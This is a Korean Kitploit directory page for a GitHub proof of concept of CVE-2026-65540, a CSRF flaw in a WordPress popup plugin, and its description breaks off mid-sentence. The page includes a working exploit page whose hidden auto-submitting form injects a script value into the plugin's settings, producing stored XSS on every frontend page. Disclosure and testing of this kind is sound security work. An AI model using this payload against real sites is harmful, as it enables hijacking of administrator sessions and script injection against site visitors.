Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-65540 — Popup for CF7 with Sweet Alert <= 1.6.5 - 크로스 사이트 요청 위조 | Kitploit
도구/GitHubGitHub/testardou/cve-2026-65540
Web Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationWeb Security
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - 크로스 사이트 요청 위조

저장소 보기
14시간 33분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - 크로스 사이트 요청 위조

플러그인 URL

https://wordpress.org/plugins/cf7-sweet-alert-popup/

설명

이 플러그인의 설정 핸들러는 nonce 검증에 논리 오류가 있어 모든 CSRF 보호가 비활성화됩니다. 인증되지 않은 공격자는 숨겨진 자동 제출 폼이 포함된 악성 페이지를 인증된 관리자가 방문하도록 유도하여 이 취약점을 악용할 수 있으며, 이를 통해 플러그인 설정을 임의로 수정할 수 있습니다. 제출된 값은 정제 없이 저장되고 wp_head를 통해 모든 프런트엔드 페이지의

POC

  1. 다음 HTML 페이지를 별도의 서버에 호스팅합니다:
root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  1. 관리자로 WordPress에 로그인합니다
  2. 악성 페이지를 방문합니다
  3. (선택 사항) http://TARGET/wp-admin/admin.php?page=cf7-simplepopup 으로 이동하여 Width 필드에 이제 500;alert(document.domain)이 포함되어 있는지 확인합니다
  • 아무 프런트엔드 페이지나 방문하면 브라우저에서 alert(document.domain)이 실행되어 저장형 XSS가 확인됩니다
  • 도구 다운로드